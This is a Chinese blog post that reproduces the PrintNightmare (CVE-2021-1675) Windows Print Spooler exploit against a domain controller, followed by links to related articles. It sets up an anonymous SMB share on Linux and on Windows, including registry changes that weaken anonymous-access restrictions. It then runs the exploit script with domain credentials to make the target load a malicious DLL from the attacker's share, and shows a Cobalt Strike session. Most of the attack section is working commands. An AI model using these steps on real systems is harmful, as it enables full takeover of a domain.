漏洞复现|PrintNightmare(CVE-2021-1675)复现

最新推荐文章于 2025-03-11 03:11:10 发布
最新推荐文章于 2025-03-11 03:11:10 发布
阅读量6.1k 收藏 9
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42282189/article/details/122333229

作者: 飞天魔鬼
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x01 简介

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

环境准备

  • 一个普通权限的域账户

  • 目标开启Spooler服务

  • 创建的smb服务允许匿名访问,即目标可以直接获取到文件

    DC WindowsServer 2016 Standard
    windows smba服务器:win10
    linux smba服务器:kali

0x02 linux下攻击手法

在linux环境下,使用smbd服务可以很方便的开启匿名的samba服务器。

首先使用yum或者apt安装samba,安装完成之后修改/etc/samba/smb.conf文件为以下配置。


[global] 
workgroup = WORKGROUP 
server string = Samba Server 
netbios name = MYSERVER 
log file = /var/log/samba/log.%m 
max log size = 50 
security = user 
map to guest = Bad User 
[smb] 
comment = Template Directories 
browseable = yes 
writeable = yes 
path = /tmp/ 
guest ok = yes

其中[smb]为访问该服务器共享文件夹的名称,path为samba服务器共享的目录。

修改完成之后使用命令service smbd start开启smba服务器。
在这里插入图片描述
使用脚本CVE-2021-1675.py执行以下命令

python3 CVE-2021-1675.py hack.com/user1:User@hack.com@192.168.28.191 '\\192.168.28.190\smb\artifact.dll'

在这里插入图片描述
当出现Exploit Completed关键字的时候即为攻击成功。
在这里插入图片描述
在这里插入图片描述
可以看到已经成功上线cs

0x03 windows下攻击手法

这里使用的是三好学生的脚本

https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer

还有cube0x0放出的脚本


mkdir C:\share 
icacls C:\share\ /T /grant Anonymous` logon:r 
icacls C:\share\ /T /grant Everyone:r 
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing 
NullSessionPipes REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v 
NullSessionShares /t REG_MULTI_SZ /d share /f 
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f 
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t 
REG_DWORD /d 0 /f

入口机器执行该脚本
在这里插入图片描述
使用脚本CVE-2021-1675.py执行以下命令

python3 CVE-2021-1675.py hack.com/user1:User@hack.com@192.168.28.197 '\\192.168.28.187\smb\artifact.dll'

在这里插入图片描述
在这里插入图片描述
可以看到已经上线成功了

0x04 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

微软通杀漏洞-CVE-2021-1675复现
Ms08067安全实验室
08-19 2669
文章来源|MS08067安全实验室本文作者:龙诺(Web知识星球追洞小组)一 准备环境实验环境:windows2019 (192.168.189.145) kali linux (192...
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2556
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print Spooler是Windows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
cve-2021-1675复现
Shanfenglan's blog
07-08 1977
文章目录1. 参考文章2. 环境配置2.1 samba配置2.2 特殊的impacket配置3. 漏洞复现3.1 使用msf生成恶意dll并开启监听3.2 上传恶意dll到共享文件夹内3.3 使用exp进行利用4. 利用成果: 1. 参考文章 CentOS7搭建Samba共享文件夹 设置无密码登录 exp: cube0x0/CVE-2021-1675 2. 环境配置 2.1 samba配置 需要有一台linux机器,配置可无密码访问的共享文件夹。 下载samba: apt-get install samba
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
qq_53579360的博客
11-22 1514
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
Windows Print Spooler CVE-2021-1675 漏洞复现
p01son的博客
07-26 915
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 利用条件
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
HBohan的博客
07-19 1694
近日,有安全研究员在github上公开了”CVE-2021-1675”的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 漏洞复现 【学习网络安全但不知道怎么开始的来call me】 ​ 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现漏洞分.
CVE-2021-1675】Windows Print Spooler RCE
weixin_39664643的博客
07-29 869
漏洞复现】Windows Print Spooler RCE 前言 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。 若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx
CVE-2021-3560的漏洞说明及利用流程
smellycat000的专栏
07-20 3675
聚焦源代码安全,网罗国内外最新资讯!漏洞说明polkit是默认安装在很多Linux发行版上的系统服务。CVE-2021-3560是polkit中潜伏了7年之久的漏洞,于2021年6月份公...
【技术分享】cve-2021-1675-windows提权复现以及详细分析
weixin_45062925的博客
05-24 1255
1、漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 Github公布的地址...
微软漏洞 Cve-2021-1675复现
weixin_42345596的博客
07-07 3269
受影响版本 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Ser
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5464
CVE-2021-1675
Windows PrintNightmare 漏洞和补丁分析
smellycat000的专栏
07-07 2100
聚焦源代码安全,网罗国内外最新资讯!一、背景CVE-2021-34527是发生在windows打印服务中的漏洞,攻击者可以利用该漏洞使用低权限用户加载恶意DLL,实现远程代码执行。该漏洞...
CVE-2021-1675(Windows Print Spooler 远程代码执行漏洞
子曰小玖的博客
09-07 3011
0x00 漏洞详情 Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利
【POC公开】CVE-2021-1675: Windows Print Spooler远程代码执行漏洞通告
爱国小白帽
06-29 1540
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日,360CERT监测发现安全研究人员在GitHub上公开了Windows Print Spooler远程代码执行漏洞的POC,漏洞编号为CVE-2021-1675漏洞等级:严重,漏洞评分:7.8。 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可
Windows 提权-PrintNightmare
最新发布
weixin_30551437的博客
03-11 163
本文通过 Google 翻译 PrintNightmare – Windows Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。 导航 0 前言 1 CVE-2021-34527 – PrintNightmare RCE(准 远程代码执行) 1.1 远程枚举 Print Spooler 服务 1.2 行刑前的准备...
CVE-2021-34429漏洞复现
03-11
CVE-2021-34429是一个存在于Windows Print Spooler服务中的远程代码执行漏洞,通常被称为PrintNightmare。该漏洞允许未经身份验证的攻击者通过精心构造的RPC调用来执行任意代码[^6]。 #### 影响范围 受影响的产品...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值